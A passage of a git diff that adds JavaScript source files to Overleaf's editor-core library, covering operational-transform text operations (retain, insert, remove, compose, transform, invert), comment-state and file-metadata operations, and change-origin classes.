@param {ScanOp} other + */ + mergeWith(other) { + if (!this.canMergeWith(other)) { + throw new Error('Cannot merge with incompatible operation') + } + this.length += other.length + } + + /** + * @returns {RawRetainOp} + */ + toJSON() { + if (!this.tracking) { + return this.length + } + return { r: this.length, tracking: this.tracking.toRaw() } + } + + toString() { + return `retain ${this.length}` + } +} + +class RemoveOp extends ScanOp { + /** + * @param {number} length + */ + constructor(length) { + super() + if (length < 0) { + throw new Error('length must be non-negative') + } + /** @type {number} */ + this.length = length + } + + /** + * @inheritdoc + * @param {LengthApplyContext} current + * @returns {LengthApplyContext} + */ + applyToLength(current) { + current.inputCursor += this.length + return current + } + + /** + * + * @param {RawRemoveOp} op + * @returns {RemoveOp} + */ + static fromJSON(op) { + if (typeof op !== 'number' || op > 0) { + throw new Error('delete operation must be a negative number') + } + return new RemoveOp(-op) + } + + /** + * @inheritdoc + * @param {ScanOp} other + * @return {boolean} + */ + equals(other) { + if (!(other instanceof RemoveOp)) { + return false + } + return this.length === other.length + } + + /** + * @param {ScanOp} other + * @return {other is RemoveOp} + */ + canMergeWith(other) { + return other instanceof RemoveOp + } + + /** + * @param {ScanOp} other + */ + mergeWith(other) { + if (!this.canMergeWith(other)) { + throw new Error('Cannot merge with incompatible operation') + } + this.length += other.length + } + + /** + * @returns {RawRemoveOp} + */ + toJSON() { + return -this.length + } + + toString() { + return `remove ${this.length}` + } +} + +/** + * @param {RawScanOp} op + * @returns {op is RawRetainOp} + */ +function isRetain(op) { + return ( + (typeof op === 'number' && op > 0) || + (typeof op === 'object' && + 'r' in op && + typeof op.r === 'number' && + op.r > 0) + ) +} + +/** + * @param {RawScanOp} op + * @returns {op is RawInsertOp} + */ +function isInsert(op) { + return ( + typeof op === 'string' || + (typeof op === 'object' && 'i' in op && typeof op.i === 'string') + ) +} + +/** + * @param {RawScanOp} op + * @returns {op is RawRemoveOp} + */ +function isRemove(op) { + return typeof op === 'number' && op < 0 +} + +module.exports = { + ScanOp, + InsertOp, + RetainOp, + RemoveOp, + isRetain, + isInsert, + isRemove, +} diff --git a/libraries/overleaf-editor-core/lib/operation/set_comment_state_operation.js b/libraries/overleaf-editor-core/lib/operation/set_comment_state_operation.js new file mode 100644 index 0000000..5ac1a46 --- /dev/null +++ b/libraries/overleaf-editor-core/lib/operation/set_comment_state_operation.js @@ -0,0 +1,112 @@ +// @ts-check +const core = require('../../index') +const Comment = require('../comment') +const EditNoOperation = require('./edit_no_operation') +const EditOperation = require('./edit_operation') + +/** + * @import DeleteCommentOperation from './delete_comment_operation' + * @import { CommentRawData } from '../types' + * @import { RawSetCommentStateOperation } from '../types' + * @import StringFileData from '../file_data/string_file_data' + */ + +/** + * @extends EditOperation + */ +class SetCommentStateOperation extends EditOperation { + /** + * @param {string} commentId + * @param {boolean} resolved + */ + constructor(commentId, resolved) { + super() + this.commentId = commentId + this.resolved = resolved + } + + /** + * + * @returns {RawSetCommentStateOperation} + */ + toJSON() { + return { + resolved: this.resolved, + commentId: this.commentId, + } + } + + /** + * @param {StringFileData} fileData + */ + apply(fileData) { + const comment = fileData.comments.getComment(this.commentId) + if (comment) { + const newComment = new Comment(comment.id, comment.ranges, this.resolved) + fileData.comments.add(newComment) + } + } + + /** + * @param {StringFileData} previousState + * @returns {SetCommentStateOperation | EditNoOperation} + */ + invert(previousState) { + const comment = previousState.comments.getComment(this.commentId) + if (!comment) { + return new EditNoOperation() + } + + return new SetCommentStateOperation(this.commentId, comment.resolved) + } + + /** + * @inheritdoc + * @param {EditOperation} other + * @returns {boolean} + */ + canBeComposedWith(other) { + return ( + (other instanceof SetCommentStateOperation && + this.commentId === other.commentId) || + (other instanceof core.DeleteCommentOperation && + this.commentId === other.commentId) + ) + } + + /** + * @inheritdoc + * @param {EditOperation} other + * @returns {SetCommentStateOperation | core.DeleteCommentOperation} + */ + compose(other) { + if ( + other instanceof SetCommentStateOperation && + other.commentId === this.commentId + ) { + return other + } + + if ( + other instanceof core.DeleteCommentOperation && + other.commentId === this.commentId + ) { + return other + } + + throw new Error( + `Trying to compose SetCommentStateOperation with ${other?.constructor?.name}.` + ) + } + + /** + * @inheritdoc + * @param {RawSetCommentStateOperation} raw + * @returns {SetCommentStateOperation} + */ + static fromJSON(raw) { + return new SetCommentStateOperation(raw.commentId, raw.resolved) + } +} + +module.exports = SetCommentStateOperation diff --git a/libraries/overleaf-editor-core/lib/operation/set_file_metadata_operation.js b/libraries/overleaf-editor-core/lib/operation/set_file_metadata_operation.js new file mode 100644 index 0000000..5bdd00f --- /dev/null +++ b/libraries/overleaf-editor-core/lib/operation/set_file_metadata_operation.js @@ -0,0 +1,53 @@ +'use strict' + +const _ = require('lodash') +const assert = require('check-types').assert + +const Operation = require('./') + +/** + * Moves or removes a file from a project. + */ +class SetFileMetadataOperation extends Operation { + /** + * @param {string} pathname + * @param {Object} metadata + */ + constructor(pathname, metadata) { + super() + assert.string(pathname, 'SetFileMetadataOperation: bad pathname') + assert.object(metadata, 'SetFileMetadataOperation: bad metadata') + + this.pathname = pathname + this.metadata = metadata + } + + /** + * @inheritdoc + */ + toRaw() { + return { + pathname: this.pathname, + metadata: _.cloneDeep(this.metadata), + } + } + + getPathname() { + return this.pathname + } + + getMetadata() { + return this.metadata + } + + /** + * @inheritdoc + */ + applyTo(snapshot) { + const file = snapshot.getFile(this.pathname) + if (!file) return + file.setMetadata(this.metadata) + } +} + +module.exports = SetFileMetadataOperation diff --git a/libraries/overleaf-editor-core/lib/operation/text_operation.js b/libraries/overleaf-editor-core/lib/operation/text_operation.js new file mode 100644 index 0000000..148570f --- /dev/null +++ b/libraries/overleaf-editor-core/lib/operation/text_operation.js @@ -0,0 +1,929 @@ +// @ts-check +/** + * The text operation from OT.js with some minor cosmetic changes. + * + * Specifically, this is based on + * https://github.com/Operational-Transformation/ot.js/ + * blob/298825f58fb51fefb352e7df5ddbc668f4d5646f/lib/text-operation.js + * from 18 Mar 2013. + */ + +'use strict' +const containsNonBmpChars = require('../util').containsNonBmpChars +const EditOperation = require('./edit_operation') +const { + RetainOp, + InsertOp, + RemoveOp, + isRetain, + isInsert, + isRemove, +} = require('./scan_op') +const { + UnprocessableError, + ApplyError, + InvalidInsertionError, + TooLongError, +} = require('../errors') +const Range = require('../range') +const ClearTrackingProps = require('../file_data/clear_tracking_props') +const TrackingProps = require('../file_data/tracking_props') + +/** + * @import StringFileData from '../file_data/string_file_data' + * @import { RawTextOperation, TrackingDirective } from '../types' + * @import { ScanOp } from '../operation/scan_op' + * @import TrackedChangeList from '../file_data/tracked_change_list' + * + * @typedef {{tracking?: TrackingProps, commentIds?: string[]}} InsertOptions + */ + +/** + * Create an empty text operation. + * @extends EditOperation + */ +class TextOperation extends EditOperation { + /** + * Length of the longest file that we'll attempt to edit, in characters. + * + * @type {number} + */ + static MAX_STRING_LENGTH = 2 * Math.pow(1024, 2) + static UnprocessableError = UnprocessableError + static ApplyError = ApplyError + static InvalidInsertionError = InvalidInsertionError + static TooLongError = TooLongError + + constructor() { + super() + + /** + * When an operation is applied to an input string, you can think of this as + * if an imaginary cursor runs over the entire string and skips over some + * parts, removes some parts and inserts characters at some positions. These + * actions (skip/remove/insert) are stored as an array in the "ops" property. + * @type {ScanOp[]} + */ + this.ops = [] + + /** + * An operation's baseLength is the length of every string the operation + * can be applied to. + */ + this.baseLength = 0 + + /** + * The targetLength is the length of every string that results from applying + * the operation on a valid input string. + */ + this.targetLength = 0 + + /** + * The expected content hash after this operation is applied + * + * @type {string | null} + */ + this.contentHash = null + } + + /** + * @param {TextOperation} other + * @return {boolean} + */ + equals(other) { + if (this.baseLength !== other.baseLength) { + return false + } + if (this.targetLength !== other.targetLength) { + return false + } + if (this.ops.length !== other.ops.length) { + return false + } + for (let i = 0; i < this.ops.length; i++) { + if (!this.ops[i].equals(other.ops[i])) { + return false + } + } + return true + } + + // After an operation is constructed, the user of the library can specify the + // actions of an operation (skip/insert/remove) with these three builder + // methods. They all return the operation for convenient chaining. + + /** + * Skip over a given number of characters. + * @param {number | {r: number}} n + * @param {{tracking?: TrackingDirective}} opts + * @returns {TextOperation} + */ + retain(n, opts = {}) { + if (n === 0) { + return this + } + + if (!isRetain(n)) { + throw new Error('retain expects an integer or a retain object') + } + const newOp = RetainOp.fromJSON(n) + newOp.tracking = opts.tracking + + if (newOp.length === 0) { + return this + } + + this.baseLength += newOp.length + this.targetLength += newOp.length + + const lastOperation = this.ops[this.ops.length - 1] + if (lastOperation?.canMergeWith(newOp)) { + // The last op is a retain op => we can merge them into one op. + lastOperation.mergeWith(newOp) + } else { + // Create a new op. + this.ops.push(newOp) + } + return this + } + + /** + * Insert a string at the current position. + * @param {string | {i: string}} insertValue + * @param {InsertOptions} opts + * @returns {TextOperation} + */ + insert(insertValue, opts = {}) { + if (!isInsert(insertValue)) { + throw new Error('insert expects a string or an insert object') + } + const newOp = InsertOp.fromJSON(insertValue) + newOp.tracking = opts.tracking + newOp.commentIds = opts.commentIds + if (newOp.insertion === '') { + return this + } + this.targetLength += newOp.insertion.length + const ops = this.ops + const lastOp = this.ops[this.ops.length - 1] + if (lastOp?.canMergeWith(newOp)) { + // Merge insert op. + lastOp.mergeWith(newOp) + } else if (lastOp instanceof RemoveOp) { + // It doesn't matter when an operation is applied whether the operation + // is remove(3), insert("something") or insert("something"), remove(3). + // Here we enforce that in this case, the insert op always comes first. + // This makes all operations that have the same effect when applied to + // a document of the right length equal in respect to the `equals` method. + const secondToLastOp = ops[ops.length - 2] + if (secondToLastOp?.canMergeWith(newOp)) { + secondToLastOp.mergeWith(newOp) + } else { + ops[ops.length] = ops[ops.length - 1] + ops[ops.length - 2] = newOp + } + } else { + ops.push(newOp) + } + return this + } + + /** + * Remove a string at the current position. + * @param {number | string} n + * @returns {TextOperation} + */ + remove(n) { + if (typeof n === 'string') { + n = n.length + } + if (typeof n !== 'number') { + throw new Error('remove expects an integer or a string') + } + if (n === 0) { + return this + } + if (n > 0) { + n = -n + } + const newOp = RemoveOp.fromJSON(n) + this.baseLength -= n + const lastOp = this.ops[this.ops.length - 1] + if (lastOp?.canMergeWith(newOp)) { + lastOp.mergeWith(newOp) + } else { + this.ops.push(newOp) + } + return this + } + + /** + * Tests whether this operation has no effect. + */ + isNoop() { + return ( + this.ops.length === 0 || + (this.ops.length === 1 && this.ops[0] instanceof RetainOp) + ) + } + + /** + * Pretty printing. + */ + toString() { + return this.ops.map(op => op.toString()).join(', ') + } + + /** + * @inheritdoc + * @returns {RawTextOperation} + */ + toJSON() { + /** @type {RawTextOperation} */ + const json = { textOperation: this.ops.map(op => op.toJSON()) } + if (this.contentHash != null) { + json.contentHash = this.contentHash + } + return json + } + + /** + * Converts a plain JS object into an operation and validates it. + * @param {RawTextOperation} obj + * @returns {TextOperation} + */ + static fromJSON = function ({ textOperation: ops, contentHash }) { + const o = new TextOperation() + for (const op of ops) { + if (isRetain(op)) { + const retain = RetainOp.fromJSON(op) + o.retain(retain.length, { tracking: retain.tracking }) + } else if (isInsert(op)) { + const insert = InsertOp.fromJSON(op) + o.insert(insert.insertion, { + commentIds: insert.commentIds, + tracking: insert.tracking, + }) + } else if (isRemove(op)) { + const remove = RemoveOp.fromJSON(op) + o.remove(-remove.length) + } else { + throw new UnprocessableError('unknown operation: ' + JSON.stringify(op)) + } + } + if (contentHash != null) { + o.contentHash = contentHash + } + return o + } + + /** + * Apply an operation to a string, returning a new string. Throws an error if + * there's a mismatch between the input string and the operation. + * @override + * @inheritdoc + * @param {StringFileData} file + */ + apply(file) { + const str = file.getContent() + const operation = this + if (containsNonBmpChars(str)) { + throw new TextOperation.ApplyError( + 'The string contains non BMP characters.', + operation, + str + ) + } + if (str.length !== operation.baseLength) { + throw new TextOperation.ApplyError( + "The operation's base length must be equal to the string's length.", + operation, + str + ) + } + + const ops = this.ops + let inputCursor = 0 + let result = '' + for (const op of ops) { + if (op instanceof RetainOp) { + if (inputCursor + op.length > str.length) { + throw new ApplyError( + "Operation can't retain more chars than are left in the string.", + op.toJSON(), + str + ) + } + file.trackedChanges.applyRetain(result.length, op.length, { + tracking: op.tracking, + }) + result += str.slice(inputCursor, inputCursor + op.length) + inputCursor += op.length + } else if (op instanceof InsertOp) { + if (containsNonBmpChars(op.insertion)) { + throw new InvalidInsertionError(str, op.toJSON()) + } + file.trackedChanges.applyInsert(result.length, op.insertion, { + tracking: op.tracking, + }) + file.comments.applyInsert( + new Range(result.length, op.insertion.length), + { commentIds: op.commentIds } + ) + result += op.insertion + } else if (op instanceof RemoveOp) { + file.trackedChanges.applyDelete(result.length, op.length) + file.comments.applyDelete(new Range(result.length, op.length)) + inputCursor += op.length + } else { + throw new UnprocessableError('Unknown ScanOp type during apply') + } + } + + if (inputCursor !== str.length) { + throw new TextOperation.ApplyError( + "The operation didn't operate on the whole string.", + operation, + str + ) + } + + if (result.length > TextOperation.MAX_STRING_LENGTH) { + throw new TextOperation.TooLongError(operation, result.length) + } + + file.content = result + } + + /** + * @inheritdoc + * @param {number} length of the original string; non-negative + * @return {number} length of the new string; non-negative + */ + applyToLength(length) { + const operation = this + if (length !== operation.baseLength) { + throw new TextOperation.ApplyError( + "The operation's base length must be equal to the string's length.", + operation, + length + ) + } + + const { length: newLength, inputCursor } = this.ops.reduce( + (intermediate, op) => op.applyToLength(intermediate), + { length: 0, inputCursor: 0, inputLength: length } + ) + + if (inputCursor !== length) { + throw new TextOperation.ApplyError( + "The operation didn't operate on the whole string.", + operation, + length + ) + } + if (newLength > TextOperation.MAX_STRING_LENGTH) { + throw new TextOperation.TooLongError(operation, newLength) + } + return newLength + } + + /** + * @inheritdoc + * @param {StringFileData} previousState + */ + invert(previousState) { + const str = previousState.getContent() + let strIndex = 0 + const inverse = new TextOperation() + const ops = this.ops + for (let i = 0, l = ops.length; i < l; i++) { + const op = ops[i] + if (op instanceof RetainOp) { + // Where we need to end up after the retains + const target = strIndex + op.length + // A previous retain could have overriden some tracking info. Now we + // need to restore it. + const previousRanges = previousState.trackedChanges.inRange( + new Range(strIndex, op.length) + ) + + let removeTrackingInfoIfNeeded + if (op.tracking) { + removeTrackingInfoIfNeeded = new ClearTrackingProps() + } + + for (const trackedChange of previousRanges) { + if (strIndex < trackedChange.range.start) { + inverse.retain(trackedChange.range.start - strIndex, { + tracking: removeTrackingInfoIfNeeded, + }) + strIndex = trackedChange.range.start + } + if (trackedChange.range.end < strIndex + op.length) { + inverse.retain(trackedChange.range.length, { + tracking: trackedChange.tracking, + }) + strIndex = trackedChange.range.end + } + if (trackedChange.range.end !== strIndex) { + // No need to split the range at the end + const [left] = trackedChange.range.splitAt(strIndex) + inverse.retain(left.length, { tracking: trackedChange.tracking }) + strIndex = left.end + } + } + if (strIndex < target) { + inverse.retain(target - strIndex, { + tracking: removeTrackingInfoIfNeeded, + }) + strIndex = target + } + } else if (op instanceof InsertOp) { + inverse.remove(op.insertion.length) + } else if (op instanceof RemoveOp) { + const segments = calculateTrackingCommentSegments( + strIndex, + op.length, + previousState.comments, + previousState.trackedChanges + ) + for (const segment of segments) { + inverse.insert(str.slice(strIndex, strIndex + segment.length), { + tracking: segment.tracking, + commentIds: segment.commentIds, + }) + strIndex += segment.length + } + } else { + throw new UnprocessableError('unknown scanop during inversion') + } + } + return inverse + } + + /** + * @inheritdoc + * @param {EditOperation} other + */ + canBeComposedWithForUndo(other) { + if (!(other instanceof TextOperation)) { + return false + } + + if (this.isNoop() || other.isNoop()) { + return true + } + + const startA = getStartIndex(this) + const startB = getStartIndex(other) + const simpleA = getSimpleOp(this) + const simpleB = getSimpleOp(other) + if (!simpleA || !simpleB) { + return false + } + + if (simpleA instanceof InsertOp && simpleB instanceof InsertOp) { + return startA + simpleA.insertion.length === startB + } + + if (simpleA instanceof RemoveOp && simpleB instanceof RemoveOp) { + // there are two possibilities to delete: with backspace and with the + // delete key. + return startB + simpleB.length === startA || startA === startB + } + + return false + } + + /** + * @inheritdoc + * @param {EditOperation} other + */ + canBeComposedWith(other) { + if (!(other instanceof TextOperation)) { + return false + } + return this.targetLength === other.baseLength + } + + /** + * @inheritdoc + * @param {EditOperation} operation2 + */ + compose(operation2) { + if (!(operation2 instanceof TextOperation)) { + throw new Error( + `Trying to compose TextOperation with ${operation2?.constructor?.name}.` + ) + } + const operation1 = this + if (operation1.targetLength !== operation2.baseLength) { + throw new Error( + 'The base length of the second operation has to be the ' + + 'target length of the first operation' + ) + } + + const operation = new TextOperation() // the combined operation + const ops1 = operation1.ops + const ops2 = operation2.ops // for fast access + let i1 = 0 + let i2 = 0 // current index into ops1 respectively ops2 + let op1 = ops1[i1++] + let op2 = ops2[i2++] // current ops + for (;;) { + // Dispatch on the type of op1 and op2 + if (typeof op1 === 'undefined' && typeof op2 === 'undefined') { + // end condition: both ops1 and ops2 have been processed + break + } + + if (op1 instanceof RemoveOp) { + operation.remove(-op1.length) + op1 = ops1[i1++] + continue + } + + if (op2 instanceof InsertOp) { + operation.insert(op2.insertion, { + tracking: op2.tracking, + commentIds: op2.commentIds, + }) + op2 = ops2[i2++] + continue + } + + if (typeof op1 === 'undefined') { + throw new Error( + 'Cannot compose operations: first operation is too short.' + ) + } + if (typeof op2 === 'undefined') { + throw new Error( + 'Cannot compose operations: first operation is too long.' + ) + } + + if (op1 instanceof RetainOp && op2 instanceof RetainOp) { + // If both have tracking info, use the latter one. Otherwise use the + // tracking info from the former. + const tracking = op2.tracking ?? op1.tracking + if (op1.length > op2.length) { + operation.retain(op2.length, { + tracking, + }) + op1 = new RetainOp(op1.length - op2.length, op1.tracking) + op2 = ops2[i2++] + } else if (op1.length === op2.length) { + operation.retain(op1.length, { + tracking, + }) + op1 = ops1[i1++] + op2 = ops2[i2++] + } else { + operation.retain(op1.length, { + tracking, + }) + op2 = new RetainOp(op2.length - op1.length, op2.tracking) + op1 = ops1[i1++] + } + } else if (op1 instanceof InsertOp && op2 instanceof RemoveOp) { + if (op1.insertion.length > op2.length) { + op1 = new InsertOp( + op1.insertion.slice(op2.length), + op1.tracking, + op1.commentIds + ) + op2 = ops2[i2++] + } else if (op1.insertion.length === op2.length) { + op1 = ops1[i1++] + op2 = ops2[i2++] + } else { + op2 = RemoveOp.fromJSON(op1.insertion.length - op2.length) + op1 = ops1[i1++] + } + } else if (op1 instanceof InsertOp && op2 instanceof RetainOp) { + /** @type InsertOptions */ + const opts = { + commentIds: op1.commentIds, + } + if (op2.tracking instanceof TrackingProps) { + // Prefer the tracking info on the second operation + opts.tracking = op2.tracking + } else if (!(op2.tracking instanceof ClearTrackingProps)) { + // The second operation does not cancel the first operation's tracking + opts.tracking = op1.tracking + } + if (op1.insertion.length > op2.length) { + operation.insert(op1.insertion.slice(0, op2.length), opts) + op1 = new InsertOp( + op1.insertion.slice(op2.length), + op1.tracking, + op1.commentIds + ) + op2 = ops2[i2++] + } else if (op1.insertion.length === op2.length) { + operation.insert(op1.insertion, opts) + op1 = ops1[i1++] + op2 = ops2[i2++] + } else { + operation.insert(op1.insertion, opts) + op2 = new RetainOp(op2.length - op1.insertion.length, op2.tracking) + op1 = ops1[i1++] + } + } else if (op1 instanceof RetainOp && op2 instanceof RemoveOp) { + if (op1.length > op2.length) { + operation.remove(-op2.length) + op1 = new RetainOp(op1.length - op2.length, op1.tracking) + op2 = ops2[i2++] + } else if (op1.length === op2.length) { + operation.remove(-op2.length) + op1 = ops1[i1++] + op2 = ops2[i2++] + } else { + operation.remove(op1.length) + op2 = RemoveOp.fromJSON(op1.length - op2.length) + op1 = ops1[i1++] + } + } else { + throw new Error( + "This shouldn't happen: op1: " + + JSON.stringify(op1) + + ', op2: ' + + JSON.stringify(op2) + ) + } + } + return operation + } + + /** + * Transform takes two operations A and B that happened concurrently and + * produces two operations A' and B' (in an array) such that + * `apply(apply(S, A), B') = apply(apply(S, B), A')`. This function is the + * heart of OT. + * @param {TextOperation} operation1 + * @param {TextOperation} operation2 + * @returns {[TextOperation, TextOperation]} + */ + static transform(operation1, operation2) { + if (operation1.baseLength !== operation2.baseLength) { + throw new Error('Both operations have to have the same base length') + } + + const operation1prime = new TextOperation() + const operation2prime = new TextOperation() + const ops1 = operation1.ops + const ops2 = operation2.ops + let i1 = 0 + let i2 = 0 + let op1 = ops1[i1++] + let op2 = ops2[i2++] + for (;;) { + // At every iteration of the loop, the imaginary cursor that both + // operation1 and operation2 have that operates on the input string must + // have the same position in the input string. + + if (typeof op1 === 'undefined' && typeof op2 === 'undefined') { + // end condition: both ops1 and ops2 have been processed + break + } + + // next two cases: one or both ops are insert ops + // => insert the string in the corresponding prime operation, skip it in + // the other one. If both op1 and op2 are insert ops, prefer op1. + if (op1 instanceof InsertOp) { + operation1prime.insert(op1.insertion, { + tracking: op1.tracking, + commentIds: op1.commentIds, + }) + operation2prime.retain(op1.insertion.length) + op1 = ops1[i1++] + continue + } + if (op2 instanceof InsertOp) { + operation1prime.retain(op2.insertion.length) + operation2prime.insert(op2.insertion, { + tracking: op2.tracking, + commentIds: op2.commentIds, + }) + op2 = ops2[i2++] + continue + } + + if (typeof op1 === 'undefined') { + throw new Error( + 'Cannot compose operations: first operation is too short.' + ) + } + if (typeof op2 === 'undefined') { + throw new Error( + 'Cannot compose operations: first operation is too long.' + ) + } + + let minl + if (op1 instanceof RetainOp && op2 instanceof RetainOp) { + // Simple case: retain/retain + + // If both have tracking info, we use the one from op1 + /** @type {TrackingProps | ClearTrackingProps | undefined} */ + let operation1primeTracking + /** @type {TrackingProps | ClearTrackingProps | undefined} */ + let operation2primeTracking + if (op1.tracking) { + operation1primeTracking = op1.tracking + } else { + operation2primeTracking = op2.tracking + } + + if (op1.length > op2.length) { + minl = op2.length + op1 = new RetainOp(op1.length - op2.length, op1.tracking) + op2 = ops2[i2++] + } else if (op1.length === op2.length) { + minl = op2.length + op1 = ops1[i1++] + op2 = ops2[i2++] + } else { + minl = op1.length + op2 = new RetainOp(op2.length - op1.length, op2.tracking) + op1 = ops1[i1++] + } + operation1prime.retain(minl, { tracking: operation1primeTracking }) + operation2prime.retain(minl, { tracking: operation2primeTracking }) + } else if (op1 instanceof RemoveOp && op2 instanceof RemoveOp) { + // Both operations remove the same string at the same position. We don't + // need to produce any operations, we just skip over the remove ops and + // handle the case that one operation removes more than the other. + if (op1.length > op2.length) { + op1 = RemoveOp.fromJSON(op2.length - op1.length) + op2 = ops2[i2++] + } else if (op1.length === op2.length) { + op1 = ops1[i1++] + op2 = ops2[i2++] + } else { + op2 = RemoveOp.fromJSON(op1.length - op2.length) + op1 = ops1[i1++] + } + // next two cases: remove/retain and retain/remove + } else if (op1 instanceof RemoveOp && op2 instanceof RetainOp) { + if (op1.length > op2.length) { + minl = op2.length + op1 = RemoveOp.fromJSON(op2.length - op1.length) + op2 = ops2[i2++] + } else if (op1.length === op2.length) { + minl = op2.length + op1 = ops1[i1++] + op2 = ops2[i2++] + } else { + minl = op1.length + op2 = new RetainOp(op2.length - op1.length, op2.tracking) + op1 = ops1[i1++] + } + operation1prime.remove(minl) + } else if (op1 instanceof RetainOp && op2 instanceof RemoveOp) { + if (op1.length > op2.length) { + minl = op2.length + op1 = new RetainOp(op1.length - op2.length, op1.tracking) + op2 = ops2[i2++] + } else if (op1.length === op2.length) { + minl = op1.length + op1 = ops1[i1++] + op2 = ops2[i2++] + } else { + minl = op1.length + op2 = RemoveOp.fromJSON(op1.length - op2.length) + op1 = ops1[i1++] + } + operation2prime.remove(minl) + } else { + throw new Error("The two operations aren't compatible") + } + } + + return [operation1prime, operation2prime] + } +} + +// Operation are essentially lists of ops. There are three types of ops: +// +// * Retain ops: Advance the cursor position by a given number of characters. +// Represented by positive ints. +// * Insert ops: Insert a given string at the current cursor position. +// Represented by strings. +// * Remove ops: Remove the next n characters. Represented by negative ints. + +/** + * + * @param {TextOperation} operation + * @returns {ScanOp | null} + */ +function getSimpleOp(operation) { + const ops = operation.ops + switch (ops.length) { + case 1: + return ops[0] + case 2: + return ops[0] instanceof RetainOp + ? ops[1] + : ops[1] instanceof RetainOp + ? ops[0] + : null + case 3: + if (ops[0] instanceof RetainOp && ops[2] instanceof RetainOp) { + return ops[1] + } + } + return null +} + +/** + * @param {TextOperation} operation + * @return {number} + */ +function getStartIndex(operation) { + if (operation.ops[0] instanceof RetainOp) { + return operation.ops[0].length + } + return 0 +} + +/** + * Constructs the segments defined as each overlapping range of tracked + * changes and comments. Each segment can have it's own tracking props and + * attached comment ids. + * + * The quick brown fox jumps over the lazy dog + * Tracked inserts ---------- ----- + * Tracked deletes ------ + * Comment 1 ------- + * Comment 2 ---- + * Comment 3 ----------------- + * + * Approx. boundaries: | | | || | | | | + * + * @param {number} cursor + * @param {number} length + * @param {import('../file_data/comment_list')} commentsList + * @param {TrackedChangeList} trackedChangeList + * @returns {{length: number, commentIds?: string[], tracking?: TrackingProps}[]} + */ +function calculateTrackingCommentSegments( + cursor, + length, + commentsList, + trackedChangeList +) { + const breaks = new Set() + const opStart = cursor + const opEnd = cursor + length + /** + * Utility function to limit breaks to the boundary set by the operation range + * @param {number} rangeBoundary + */ + function addBreak(rangeBoundary) { + if (rangeBoundary < opStart || rangeBoundary > opEnd) { + return + } + breaks.add(rangeBoundary) + } + // Add comment boundaries + for (const comment of commentsList.comments.values()) { + for (const range of comment.ranges) { + addBreak(range.end) + addBreak(range.start) + } + } + // Add tracked change boundaries + for (const trackedChange of trackedChangeList.asSorted()) { + addBreak(trackedChange.range.start) + addBreak(trackedChange.range.end) + } + // Add operation boundaries + addBreak(opStart) + addBreak(opEnd) + + // Sort the boundaries so that we can construct ranges between them + const sortedBreaks = Array.from(breaks).sort((a, b) => a - b) + + const separateRanges = [] + for (let i = 1; i < sortedBreaks.length; i++) { + const start = sortedBreaks[i - 1] + const end = sortedBreaks[i] + const currentRange = new Range(start, end - start) + // The comment ids that cover the current range is part of this sub-range + const commentIds = commentsList.idsCoveringRange(currentRange) + // The tracking info that covers the current range is part of this sub-range + const tracking = trackedChangeList.propsAtRange(currentRange) + separateRanges.push({ + length: currentRange.length, + commentIds: commentIds.length > 0 ? commentIds : undefined, + tracking, + }) + } + return separateRanges +} + +module.exports = TextOperation diff --git a/libraries/overleaf-editor-core/lib/origin/index.js b/libraries/overleaf-editor-core/lib/origin/index.js new file mode 100644 index 0000000..6575157 --- /dev/null +++ b/libraries/overleaf-editor-core/lib/origin/index.js @@ -0,0 +1,64 @@ +'use strict' + +const assert = require('check-types').assert + +// Dependencies are loaded at the bottom of the file to mitigate circular +// dependency +let RestoreOrigin = null +let RestoreFileOrigin = null +let RestoreProjectOrigin = null + +/** + * An Origin records where a {@link Change} came from. The Origin class handles + * simple tag origins, like "it came from rich text mode", or "it came from + * uploading files". Its subclasses record more detailed data for Changes such + * as restoring a version. + */ +class Origin { + /** + * @param {string} kind + */ + constructor(kind) { + assert.string(kind, 'Origin: bad kind') + + this.kind = kind + } + + /** + * Create an Origin from its raw form. + * + * @param {Object} [raw] + * @return {Origin | null} + */ + static fromRaw(raw) { + if (!raw) return null + if (raw.kind === RestoreOrigin.KIND) return RestoreOrigin.fromRaw(raw) + if (raw.kind === RestoreFileOrigin.KIND) + return RestoreFileOrigin.fromRaw(raw) + if (raw.kind === RestoreProjectOrigin.KIND) + return RestoreProjectOrigin.fromRaw(raw) + return new Origin(raw.kind) + } + + /** + * Convert the Origin to raw form for storage or transmission. + * + * @return {Object} + */ + toRaw() { + return { kind: this.kind } + } + + /** + * @return {string} + */ + getKind() { + return this.kind + } +} + +module.exports = Origin + +RestoreOrigin = require('./restore_origin') +RestoreFileOrigin = require('./restore_file_origin') +RestoreProjectOrigin = require('./restore_project_origin') diff --git a/libraries/overleaf-editor-core/lib/origin/restore_file_origin.js b/libraries/overleaf-editor-core/lib/origin/restore_file_origin.js new file mode 100644 index 0000000..6e42467 --- /dev/null +++ b/libraries/overleaf-editor-core/lib/origin/restore_file_origin.js @@ -0,0 +1,62 @@ +'use strict' + +const assert = require('check-types').assert + +const Origin = require('.') + +class RestoreFileOrigin extends Origin { + /** + * @param {number} version that was restored + * @param {string} path that was restored + * @param {Date} timestamp from the restored version + */ + constructor(version, path, timestamp) { + assert.integer(version, 'RestoreFileOrigin: bad version') + assert.string(path, 'RestoreFileOrigin: bad path') + assert.date(timestamp, 'RestoreFileOrigin: bad timestamp') + + super(RestoreFileOrigin.KIND) + this.version = version + this.path = path + this.timestamp = timestamp + } + + static fromRaw(raw) { + return new RestoreFileOrigin(raw.version, raw.path, new Date(raw.timestamp)) + } + + /** @inheritdoc */ + toRaw() { + return { + kind: RestoreFileOrigin.KIND, + version: this.version, + path: this.path, + timestamp: this.timestamp.toISOString(), + } + } + + /** + * @return {number} + */ + getVersion() { + return this.version + } + + /** + * @return {string} + */ + getPath() { + return this.path + } + + /** + * @return {Date} + */ + getTimestamp() { + return this.timestamp + } +} + +RestoreFileOrigin.KIND = 'file-restore' + +module.exports = RestoreFileOrigin diff --git a/libraries/overleaf-editor-core/lib/origin/restore_origin.js b/libraries/overleaf-editor-core/lib/origin/restore_origin.js new file mode 100644 index 0000000..15bb425 --- /dev/null +++ b/libraries/overleaf-editor-core/lib/origin/restore_origin.js @@ -0,0 +1,62 @@ +'use strict' + +const assert = require('check-types').assert + +const Origin = require('./') + +/** + * When a {@link Change} is generated by restoring a previous version, this + * records the original version. We also store the timestamp of the restored + * version for display; technically, this is redundant, because we could + * recover it using the version ID. However, it would be very expensive to + * recover all referenced versions, and it is also possible that the change + * for the restored version will no longer exist, either because it was merged + * with other changes or was deleted. + * + * @see Origin + */ +class RestoreOrigin extends Origin { + /** + * @param {number} version that was restored + * @param {Date} timestamp from the restored version + */ + constructor(version, timestamp) { + assert.integer(version, 'RestoreOrigin: bad version') + assert.date(timestamp, 'RestoreOrigin: bad timestamp') + + super(RestoreOrigin.KIND) + this.version = version + 